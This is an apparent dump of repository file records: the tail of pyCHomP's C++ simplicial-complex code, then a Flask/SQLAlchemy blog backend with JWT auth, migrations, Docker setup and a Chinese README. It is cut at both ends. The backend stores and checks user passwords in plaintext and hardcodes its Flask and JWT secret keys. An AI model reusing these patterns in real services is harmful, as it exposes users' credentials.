begin_\\n\";\n }\n Chain c;\n for ( Simplex const& t : simplex_boundary(s) ) c += idx_[t];\n bd_[i] = c;\n //std::cout << \"boundary of \" << i << \" is equal to \" << c << \"\\n\";\n }\n begin_.push_back(Iterator(N));\n // std::cout << \"Pushed \" << N << \" onto begin_\\n\";\n\n for ( Integer i = 0; i < N; ++ i ) {\n Chain bd = bd_[i];\n for ( Integer j : bd ) {\n cbd_[j] += i;\n }\n }\n}\n\ninline Simplex SimplicialComplex::\nsimplex ( Integer i ) const{\n return simplices_[i];\n}\n\ninline Integer SimplicialComplex::\nidx ( Simplex const& s ) const {\n auto it = idx_.find(s);\n if ( it == idx_.end() ) return -1;\n return it -> second;\n}\n\ninline bool SimplicialComplex::\nadd_simplex (Simplex s) {\n std::sort(s.begin(), s.end());\n if ( idx(s) == -1 ) {\n idx_[s] = simplices_.size();\n simplices_.push_back(s);\n return true;\n } else {\n return false;\n }\n}\n\ninline void SimplicialComplex::\nadd_closed_simplex (Simplex const& s) {\n std::stack < Simplex > work_stack;\n work_stack.push(s);\n while ( not work_stack.empty() ) {\n auto t = work_stack.top();\n work_stack.pop();\n bool inserted = add_simplex(t);\n if ( inserted ) {\n for ( auto u : simplex_boundary(t) ) {\n work_stack.push(u);\n }\n }\n }\n}\n\ninline void SimplicialComplex::\ncolumn ( Integer i, std::function<void(Integer)> const& callback ) const { \n for ( auto x : bd_[i] ) callback(x);\n}\n\ninline void SimplicialComplex::\nrow ( Integer i, std::function<void(Integer)> const& callback ) const {\n for ( auto x : cbd_[i] ) callback(x);\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nSimplicialComplexBinding(py::module &m) {\n py::class_<SimplicialComplex, std::shared_ptr<SimplicialComplex>, Complex>(m, \"SimplicialComplex\")\n .def(py::init<std::vector<Simplex> const&>())\n .def(\"simplex\", &SimplicialComplex::simplex)\n .def(\"idx\", &SimplicialComplex::idx);\n}\n"
},
{
"alpha_fraction": 0.7019498348236084,
"alphanum_fraction": 0.7242339849472046,
"avg_line_length": 20.117647171020508,
"blob_id": "cfb0a94ec8850305762f32a56e3e223cd53e6ab0",
"content_id": "25491a4cdf024a3b13a8459745321c5cf4eebd34",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 359,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 17,
"path": "/CMakeLists.txt",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.12)\nproject(CHomP)\n\nadd_subdirectory(pybind11)\n\ninclude_directories ( \n ${CMAKE_SOURCE_DIR}/include\n /usr/local/include \n ${USER_INCLUDE_PATH} )\n\nlink_directories ( \n ${USER_LIBRARY_PATH} \n /usr/local/lib )\n\nmessage(\"USER INCLUDE PATH IS ${USER_INCLUDE_PATH}\")\n\npybind11_add_module(_chomp src/pychomp/_chomp/chomp.cpp)\n"
},
{
"alpha_fraction": 0.5917859077453613,
"alphanum_fraction": 0.6054760217666626,
"avg_line_length": 21.63380241394043,
"blob_id": "3232855d1e66a71639eb3d7c2239bdcc5b1cf166",
"content_id": "833b0cd40b7abf6b24293cfe99c49a7d4229658c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1607,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 71,
"path": "/src/pychomp/_chomp/include/GradedComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// GradedComplex.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include \"Integer.h\"\n#include \"Complex.h\"\n//#include \"Poset.h\"\n\nclass GradedComplex {\npublic:\n /// GradedComplex\n GradedComplex ( std::shared_ptr<Complex> c, \n std::function<Integer(Integer)> v ) : complex_(c), value_(v) {}\n\n /// complex\n std::shared_ptr<Complex>\n complex ( void ) const {\n return complex_;\n }\n\n // /// poset\n // std::shared_ptr<Poset>\n // poset ( void ) const {\n // return poset_;\n // }\n \n /// value\n Integer\n value ( Integer i) const {\n return value_(i);\n }\n\n /// count\n std::unordered_map<Integer,std::vector<Integer>>\n count ( void ) const {\n std::unordered_map<Integer,std::vector<Integer>> result;\n auto D = complex() -> dimension ();\n for ( Integer d = 0; d <= D; ++ d ) {\n for ( Integer idx : (*complex())(d) ) {\n auto v = value(idx);\n if ( result.count(v) == 0 ) result[v] = std::vector<Integer>(D+1);\n result[v][d] += 1;\n }\n }\n return result;\n }\n\nprivate:\n std::shared_ptr<Complex> complex_;\n std::function<Integer(Integer)> value_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\n#include <pybind11/functional.h>\n\nnamespace py = pybind11;\n\ninline void\nGradedComplexBinding(py::module &m) {\n py::class_<GradedComplex, std::shared_ptr<GradedComplex>>(m, \"GradedComplex\")\n .def(py::init<std::shared_ptr<Complex>,std::function<Integer(Integer)>>())\n .def(\"complex\", &GradedComplex::complex)\n .def(\"value\", &GradedComplex::value)\n .def(\"count\", &GradedComplex::count);\n}\n"
}
] | 38 |
akamuinsaner/memo_backend
|
https://github.com/akamuinsaner/memo_backend
|
b938a4dea5f66edcd99385a42507c587e5d7743d
|
9c54ff3b7b4cfa7cbdf113fa36993f09a3582c39
|
090ff67e0d2a6419c25aaa1f91ade5849afbd446
|
refs/heads/master
| 2018-11-12T07:50:37.958933 | 2018-09-16T02:45:24 | 2018-09-16T02:45:24 | 124,542,052 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6501742005348206,
"alphanum_fraction": 0.6585366129875183,
"avg_line_length": 35.82051467895508,
"blob_id": "f8e5b0cbbba34b5beb62cb979c7a853ee270c087",
"content_id": "484a30eb4f4055658e3472363f0599e3df34cb11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1435,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 39,
"path": "/app/views/user.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask import request, jsonify, Blueprint\nfrom app import db\nfrom app.models import User\nfrom flask_jwt_extended import jwt_required\nfrom flask_restful import Resource, Api, reqparse, abort\nfrom app.marshmallow import UserSchema\n\nbp_user = Blueprint('user', __name__)\napi = Api(bp_user)\nuser_schema = UserSchema()\n\nclass Register(Resource):\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('username', required=True, help=\"username can't be blank\")\n parser.add_argument('password', required=True, help=\"password can't be blank\")\n args = parser.parse_args()\n username = args['username']\n password = args['password']\n exist_user = User.query.filter(User.username == username).first()\n if (exist_user):\n abort(401, message=\"username already exist\")\n if not username or not password:\n abort(400, message=\"username and password both required\")\n user = User(username = username, password = password)\n db.session.add(user)\n db.session.commit()\n return jsonify({ 'success': True })\n\nclass UserGet(Resource):\n @jwt_required\n def get(self, user_id):\n user = User.query.get(user_id)\n if not user:\n abort(404, info=\"user not exist\")\n return user_schema.dump(user).data, 200\n\napi.add_resource(Register, '/register')\napi.add_resource(UserGet, '/user/<int:user_id>')"
},
{
"alpha_fraction": 0.6680790781974792,
"alphanum_fraction": 0.6793785095214844,
"avg_line_length": 20.484848022460938,
"blob_id": "8a81cf8d7161f2c452f3bfd5468a2c1bf0251a90",
"content_id": "040d7b7ee6b6369850396394a3905be1ee23a69d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/start.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "import os\nimport click\nfrom app import create_app\nfrom config import config\n\nenv = os.getenv('FLASK_ENV')\napp = create_app(config(env))\n\[email protected]()\ndef cli():\n pass\n\[email protected]()\ndef migrate():\n os.system('flask db migrate')\n\[email protected]()\ndef upgrade():\n os.system('flask db upgrade')\n\[email protected]()\[email protected]('--host', default='0.0.0.0', help=\"define server host\")\[email protected]('--port', default=8989, help=\"define server port\")\[email protected]('--debug', default=True, help=\"define debug mode\")\ndef run(host, port, debug):\n app.run(host=host, port=port, debug=debug)\n\ncli.add_command(migrate)\ncli.add_command(upgrade)\ncli.add_command(run)\n\nif __name__ == '__main__':\n cli()"
},
{
"alpha_fraction": 0.6561480164527893,
"alphanum_fraction": 0.6626768112182617,
"avg_line_length": 27.75,
"blob_id": "cfc094f220700d49c23221d846ae04fc02576848",
"content_id": "417bbfecb409c89feadf6516b582adf63a1ded4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 32,
"path": "/config.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "import os\nfrom datetime import timedelta\nimport pymysql\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nmysql_password = os.getenv('MYSQL_ROOT_PASSWORD')\nmysql_host = os.getenv('MYSQL_HOST')\nmysql_port = os.getenv('MYSQL_PORT')\nmysql_database = os.getenv('MYSQL_DATABASE')\n\nclass DEV_CONFIG():\n SECRET_KEY = 'wangshuai'\n DEBUG = True\n # SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\n SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:{0}@{1}:{2}/{3}'.format(\n mysql_password,\n mysql_host,\n mysql_port,\n mysql_database\n )\n SQLALCHEMY_COMMIT_ON_TEARDOWN = True\n SQLALCHEMY_COMMIT_TEARDOWN = True\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n JWT_SECRET_KEY = 'wangshuai'\n JWT_ACCESS_TOKEN_EXPIRES = timedelta(days=30)\n\n\ndef config(env = 'development'):\n configs = {\n 'development': DEV_CONFIG\n }\n return configs[env]"
},
{
"alpha_fraction": 0.597491443157196,
"alphanum_fraction": 0.597491443157196,
"avg_line_length": 26.4375,
"blob_id": "790e52840f6420a6374964a9b8155ded0a51d1b4",
"content_id": "409df229263f0169d2d79c9f07fad9428ce78f90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 877,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 32,
"path": "/app/marshmallow.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from app import ma\nfrom app.models import User, Blog, Tag\n\nclass TagSchema(ma.ModelSchema):\n class Meta:\n model = Tag\n fields = ('id', 'name')\n\nclass SimpleBlogSchema(ma.ModelSchema):\n class Meta:\n model = Blog\n fields = ('id', 'user_id', 'title', 'content', 'created_at', 'updated_at')\n\nclass SimpleUserSchema(ma.ModelSchema):\n class Meta:\n model = User\n fields = ('id', 'username')\n\nclass UserSchema(ma.ModelSchema):\n class Meta:\n model = User\n fields = ('id', 'username', 'blogs')\n blogs = ma.Nested(SimpleBlogSchema, many=True)\n\nclass BlogSchema(ma.ModelSchema):\n class Meta:\n model = Blog\n fields = (\n 'id', 'user_id', 'title', 'content', 'created_at', 'updated_at', 'user', 'tags'\n )\n tags = ma.Nested(TagSchema, many=True)\n user = ma.Nested(SimpleUserSchema)"
},
{
"alpha_fraction": 0.6287102103233337,
"alphanum_fraction": 0.633567214012146,
"avg_line_length": 30.423728942871094,
"blob_id": "5222127c289c16fab8bbe63a13488a6e9f677d36",
"content_id": "09c470b255a017ffdf96cdb480a6eb70228ed663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1853,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 59,
"path": "/app/models.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from app import db\nfrom datetime import datetime\n\nfollows = db.Table(\n 'follows',\n db.Column('follower_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),\n db.Column('following_id', db.Integer, db.ForeignKey('user.id'), primary_key=True)\n)\n\nclass User(db.Model):\n __tablename__ = 'user'\n\n id = db.Column(db.Integer, primary_key = True)\n username = db.Column(db.String(80), unique=True, nullable=False)\n password = db.Column(db.String(200), nullable=False)\n blogs = db.relationship('Blog', backref=\"user\", lazy=True)\n followers = db.relationship(\n 'User',\n secondary=\"follows\",\n primaryjoin=\"User.id==follows.c.following_id\",\n secondaryjoin=\"User.id==follows.c.follower_id\",\n backref=\"followings\"\n )\n\n def __repr__(self):\n return '<User %r>' % self.username\n\ntags = db.Table(\n 'tags',\n db.Column('tag_id', db.Integer, db.ForeignKey('tag.id'), primary_key=True),\n db.Column('blog_id', db.Integer, db.ForeignKey('blog.id'), primary_key=True),\n)\n\nclass Blog(db.Model):\n __tablename__ = 'blog'\n\n id = db.Column(db.Integer, primary_key = True)\n title = db.Column(db.String(50), nullable=False)\n content = db.Column(db.Text, nullable=False)\n created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)\n updated_at = db.Column(\n db.DateTime,\n default=datetime.utcnow,\n nullable=False,\n onupdate=datetime.utcnow\n )\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n tags = db.relationship(\n 'Tag',\n secondary=tags,\n lazy='subquery',\n backref=db.backref('blogs', lazy=True)\n )\n\nclass Tag(db.Model):\n __tablename__ = 'tag'\n\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(10), nullable=False, unique=True)"
},
{
"alpha_fraction": 0.6013590097427368,
"alphanum_fraction": 0.6090034246444702,
"avg_line_length": 33.20388412475586,
"blob_id": "46b1cfe3bb92de903764be8d537ba1460d15cd65",
"content_id": "35b211410e4daa33455d2701220dda1116418fb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3532,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 103,
"path": "/app/views/blog.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask import request, jsonify, Blueprint\nfrom app import db\nfrom app.models import Blog, User, Tag\nfrom flask_restful import Resource, Api, reqparse, abort\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom sqlalchemy import and_\nfrom app.marshmallow import BlogSchema\n\nbp_blog = Blueprint('blog', __name__)\napi = Api(bp_blog)\nblog_schema = BlogSchema()\n\nclass BlogPost(Resource):\n @jwt_required\n def post(self):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n parser = reqparse.RequestParser()\n parser.add_argument('title', required=True, help=\"title can't be blank\")\n parser.add_argument('content', required=True, help=\"content can't be blank\")\n parser.add_argument('tags', required=False, action=\"append\")\n args = parser.parse_args()\n title = args['title']\n content = args['content']\n tags = args['tags']\n blog = Blog(title=title, content=content, user_id=user.id)\n for item in tags:\n tag = Tag(name=item)\n blog.tags.append(tag)\n db.session.add(blog)\n db.session.commit()\n return jsonify({ 'success': True })\n\nclass BlogGetPutDelete(Resource):\n @jwt_required\n def get(self, blog_id):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n user_id = user.id\n blog = Blog.query.filter(\n and_(\n Blog.id == blog_id,\n Blog.user_id == user_id\n )\n ).first()\n if not blog:\n abort(404, message='blog not exist')\n\n result = blog_schema.dump(blog).data\n return result\n\n @jwt_required\n def delete(self, blog_id):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n user_id = user.id\n blog = Blog.query.get(blog_id)\n if not blog:\n abort(404, message=\"blog not exist\")\n if blog.user_id != user_id:\n abort(401, message=\"you dont have authorization\")\n db.session.delete(blog)\n db.session.commit()\n return { 'success': True }, 200\n\n @jwt_required\n def put(self, blog_id):\n current_user = get_jwt_identity()\n user = User.query.filter(User.username==current_user).first()\n user_id = user.id\n blog = Blog.query.get(blog_id)\n if not blog:\n abort(404, message=\"blog not exist\")\n if blog.user_id != user_id:\n abort(401, message=\"you dont have authorization\")\n\n parser = reqparse.RequestParser()\n parser.add_argument('title')\n parser.add_argument('content')\n args = parser.parse_args()\n blog.title = args['title'] or blog.title\n blog.content = args['content'] or blog.content\n\n db.session.add(blog)\n db.session.commit()\n return { 'success': True }, 200\n\nclass BlogList(Resource):\n @jwt_required\n def get(self):\n blogs = Blog.query.all()\n return blog_schema.dump(blogs, many=True).data, 200\n\nclass BlogWithUser(Resource):\n @jwt_required\n def get(self, user_id):\n blogs = Blog.query.filter(Blog.user_id == user_id).all()\n return blog_schema.dump(blogs, many=True).data, 200\n\napi.add_resource(BlogPost, '/blog')\napi.add_resource(BlogGetPutDelete, '/blog/<int:blog_id>')\napi.add_resource(BlogList, '/blogs')\napi.add_resource(BlogWithUser, '/blogs/<int:user_id>')\n\n\n\n \n\n"
},
{
"alpha_fraction": 0.6278245449066162,
"alphanum_fraction": 0.645990252494812,
"avg_line_length": 32.19117736816406,
"blob_id": "34b42882dab1799c8d0eba6cd955c91f0ac6271e",
"content_id": "7542cdcbdad13257337232087d04eafd1cb74201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2257,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 68,
"path": "/migrations/versions/cd9205e1a4ad_.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "\"\"\"empty message\n\nRevision ID: cd9205e1a4ad\nRevises: \nCreate Date: 2018-09-14 14:20:10.578961\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cd9205e1a4ad'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('tag',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=10), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=80), nullable=False),\n sa.Column('password', sa.String(length=200), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('username')\n )\n op.create_table('blog',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=50), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('follows',\n sa.Column('follower_id', sa.Integer(), nullable=False),\n sa.Column('following_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['following_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('follower_id', 'following_id')\n )\n op.create_table('tags',\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.Column('blog_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['blog_id'], ['blog.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tag.id'], ),\n sa.PrimaryKeyConstraint('tag_id', 'blog_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('tags')\n op.drop_table('follows')\n op.drop_table('blog')\n op.drop_table('user')\n op.drop_table('tag')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.6991474032402039,
"alphanum_fraction": 0.6991474032402039,
"avg_line_length": 20.05128288269043,
"blob_id": "75b745ee5697d928bde6ac9325e07561d922f56a",
"content_id": "7ed4bdd3d6f26a71dbaeedbca14e3b2999270428",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 39,
"path": "/app/__init__.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask_cors import CORS\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_jwt_extended import JWTManager\nfrom flask_marshmallow import Marshmallow\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\ndef create_app(config):\n app = Flask(__name__)\n\n app.config.from_object(config)\n\n db.init_app(app)\n\n Migrate(app, db)\n\n JWTManager(app)\n\n ma.init_app(app)\n\n CORS(app)\n\n @app.route('/')\n def hello():\n return 'hello world'\n\n from app.auth import bp_auth\n from app.views.user import bp_user\n from app.views.blog import bp_blog\n from app.views.follow import bp_follow\n app.register_blueprint(bp_auth)\n app.register_blueprint(bp_user)\n app.register_blueprint(bp_blog)\n app.register_blueprint(bp_follow)\n\n return app\n"
},
{
"alpha_fraction": 0.6122743487358093,
"alphanum_fraction": 0.6231046915054321,
"avg_line_length": 30.477272033691406,
"blob_id": "7bbbe675ce925394a2f1a9d97c8a42fe58294a2e",
"content_id": "ba1d5f6d4e07f106359b7f2758a311efdae4ba5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1385,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 44,
"path": "/app/auth.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required\nfrom flask_restful import abort, Api, Resource\nfrom sqlalchemy import and_\nfrom app.logger import config_logger\nfrom flask import jsonify, request, Blueprint\nfrom app.models import User\n\nbp_auth = Blueprint('auth', __name__)\napi = Api(bp_auth)\nlogger = config_logger(__name__, 'info', 'user.log')\n\nclass Auth(Resource):\n def post(self):\n username = request.form.get('username', None)\n password = request.form.get('password', None)\n\n if not username:\n abort(400, message=\"Missing username parameter\")\n if not password:\n abort(400, message=\"Missing password parameter\")\n\n user = User.query.filter(\n and_(\n User.username == username,\n User.password == password\n )\n ).first()\n\n if not user:\n logger.warning('user not exist')\n abort(404, message=\"User not exist\")\n\n access_token = create_access_token(identity=username)\n logger.info('login success')\n return { 'access_token': access_token }, 200\n\n @jwt_required\n def get(self):\n # Access the identity of the current user with get_jwt_identity\n current_user = get_jwt_identity()\n return { \"logged_in_as\" : current_user }, 200\n\n\napi.add_resource(Auth, '/auth')\n"
},
{
"alpha_fraction": 0.7767441868782043,
"alphanum_fraction": 0.8179401755332947,
"avg_line_length": 32.46666717529297,
"blob_id": "d7e41c6baa297103eb5019680e52ef93d4b30dd3",
"content_id": "67fc5286ecbe57a26701644bea9eb8850e1d2c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2627,
"license_type": "no_license",
"max_line_length": 278,
"num_lines": 45,
"path": "/README.md",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "# A SIMPLE APP BACKEND\n\n*获取代码*\ngit clone https://github.com/akamuinsaner/memo_backend.git\n\n## docker本地镜像启动\n\n*本地构建docker镜像*\nsudo docker build -t memo-backend .\n\n*启动容器*\nsudo docker run -p 5000:8989 memo-backend\n\n## 本地启动\n\n*安装虚拟环境*\npython3 -m venv .env\n\n*进入虚拟环境*\n. .env/bin/activate\n\n*安装flask插件*\npip3 install -r requirement.txt\n\n*运行项目*\npython3 run.py runserver\n\n## 2018-09-06更新\n使用mysql数据库: \n1.pip3 install pymysql; \n2.更新数据库时出现`access denied`的问题,使用root用户登录数据库执行`grant all on *.* to 'user'@'host' `\n\n## 2018-09-09更新\ndocker-compose \n使用docker-compose构建mysql镜像,构建好之后使用postman发起请求报错数据库无法连接,发现是对docker-compose理解没有到位 \n1.docker-compose在构建镜像之前会创建一个虚拟网络,通过这层网络把镜像与主机隔离开,然后在这层虚拟网络中构建镜像,所以在app中配置数据库的ip地址时不能使用127.0.0.0或者localhost,还好docker compose提供了通过服务名称来获取ip地址的功能,可以在docker compose中使用设置的服务名称来充当数据库的ip地址 \n2.在docker compose中存在host_port和container_port两个概念,当在compose.yml文件中定义了`ports -\"5000:8989\"`时,8989就是container_port,5000就是host_port,container_port可以提供在服务之间的端口访问,而在虚拟网络外部访问服务时需要用host_port。犯的一个错误就是在app中配置数据库端口号时使用了host_port,由于app和db两个服务是在compose创建的虚拟网络内部进行通信的,所以需要使用container_port \n文档地址:[docker-compose networking](https://docs.docker.com/compose/networking/)\n\n## 2018-09-14更新\n*遇到问题* 使用db migrate进行数据库迁移失败 \n*原因* 由于没有在docker-compose内做映射,进入容器后执行db migrate进行数据库迁移后导致数据库版本发生变化,而本地代码迁移脚本版本没有发生变化,误操作使得本地迁移脚本版本与数据库版本不对应,所以更新失败 \n*解决方法* 删除数据库以及当前migration文件,重新执行migration(开发环境下) \n\n使用docker volume,使镜像内文件与本地文件形成映射,更改任意一方另一方即会发生变化,便于数据库数据持久化,也便于本地代码调试,无需每次更改代码都重新构建镜像,只有更改docker-compose文件或者数据库model时需要重新构建镜像"
},
{
"alpha_fraction": 0.5099236369132996,
"alphanum_fraction": 0.7022900581359863,
"avg_line_length": 16.70270347595215,
"blob_id": "9135223bcc9b25bdfb0a7baa31e0dd6d8832154d",
"content_id": "f9dc944cabe951dc612857d5e085ae6f92d70ee2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 37,
"path": "/requirements.txt",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "alembic==1.0.0\naniso8601==3.0.2\nastroid==2.0.4\nautopep8==1.3.5\nclick==6.7\nFlask==1.0.2\nFlask-Cors==3.0.6\nFlask-JWT==0.3.2\nFlask-JWT-Extended==3.12.1\nFlask-Migrate==2.2.1\nFlask-RESTful==0.3.6\nFlask-Script==2.0.6\nFlask-SQLAlchemy==2.3.2\nisort==4.3.4\nitsdangerous==0.24\nJinja2==2.10\nlazy-object-proxy==1.3.1\nMako==1.0.7\nMarkupSafe==1.0\nmccabe==0.6.1\npycodestyle==2.4.0\nPyJWT==1.4.2\npylint==2.1.1\npython-dateutil==2.7.3\npython-editor==1.0.3\npytz==2018.5\nplumbum==1.6.7\nsix==1.11.0\nSQLAlchemy==1.2.10\ntyped-ast==1.1.0\nWerkzeug==0.14.1\nwrapt==1.10.11\nmarshmallow-sqlalchemy==0.14.1\nflask-marshmallow==0.9.0\nmarshmallow==2.15.4\nPyMySQL==0.9.2\nsetuptools==39.0.1\n"
},
{
"alpha_fraction": 0.6274900436401367,
"alphanum_fraction": 0.6322709321975708,
"avg_line_length": 35.911766052246094,
"blob_id": "b2a5d28d91ac404e90b247d052f984eaf32698a2",
"content_id": "61c06d5798cbfee8685f7ed6b8de183047d65345",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2510,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 68,
"path": "/app/views/follow.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from app.models import User\nfrom flask import request, jsonify, Blueprint\nfrom app import db\nfrom flask_restful import Resource, Api, reqparse, abort\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom app.marshmallow import SimpleUserSchema\n\nbp_follow = Blueprint('follow', __name__)\napi = Api(bp_follow)\nusers_schema = SimpleUserSchema(many=True)\n\nclass FollowerList(Resource):\n @jwt_required\n def get(self, user_id):\n user = User.query.filter(User.id == user_id).first()\n if not user:\n abort(404, message=\"user not exist\")\n return users_schema.dump(user.followers).data\n\nclass FollowingList(Resource):\n @jwt_required\n def get(self, user_id):\n user = User.query.filter(User.id == user_id).first()\n if not user:\n abort(404, message=\"user not exist\")\n return users_schema.dump(user.followings).data\n\nclass Follow(Resource):\n @jwt_required\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('user_ids', required=True, action=\"append\", help=\"user_ids is required\")\n current_user = get_jwt_identity()\n user = User.query.filter(User.username == current_user).first()\n if not user:\n abort(404, message=\"user not exist\")\n args = parser.parse_args()\n user_ids = args[\"user_ids\"]\n for user_id in user_ids:\n following = User.query.get(user_id)\n if following not in user.followings:\n user.followings.append(following)\n db.session.add(user)\n db.session.commit()\n return { \"success\": True }\n \n @jwt_required\n def delete(self):\n parser = reqparse.RequestParser()\n parser.add_argument('user_ids', required=True, action=\"append\", help=\"user_ids is required\")\n current_user = get_jwt_identity()\n user = User.query.filter(User.username == current_user).first()\n if not user:\n abort(404, message=\"user not exist\")\n args = parser.parse_args()\n user_ids = args[\"user_ids\"]\n for user_id in user_ids:\n following = User.query.get(user_id)\n if following in user.followings:\n user.followings.remove(following)\n db.session.add(user)\n db.session.commit()\n return { \"success\": True }\n \n\napi.add_resource(FollowerList, '/user/<int:user_id>/followers')\napi.add_resource(FollowingList, '/user/<int:user_id>/followings')\napi.add_resource(Follow, '/follow')\n"
},
{
"alpha_fraction": 0.6521739363670349,
"alphanum_fraction": 0.6859903335571289,
"avg_line_length": 13.714285850524902,
"blob_id": "fe9d699dca6a69ea8ada13ebd40c67395be3c3d3",
"content_id": "6bb8ae94d39790128b7e44658befd207442f4de7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/Dockerfile",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "FROM python:3.6.3\n\nCOPY . /docker/app\n\nWORKDIR /docker/app\n\nENV FLASK_ENV=development\n\nRUN pip install --upgrade pip && \\\n pip install -r requirements.txt\n\nEXPOSE 8989\n\nCMD [\"python\", \"start.py\", \"run\"]\n\n"
},
{
"alpha_fraction": 0.6612411141395569,
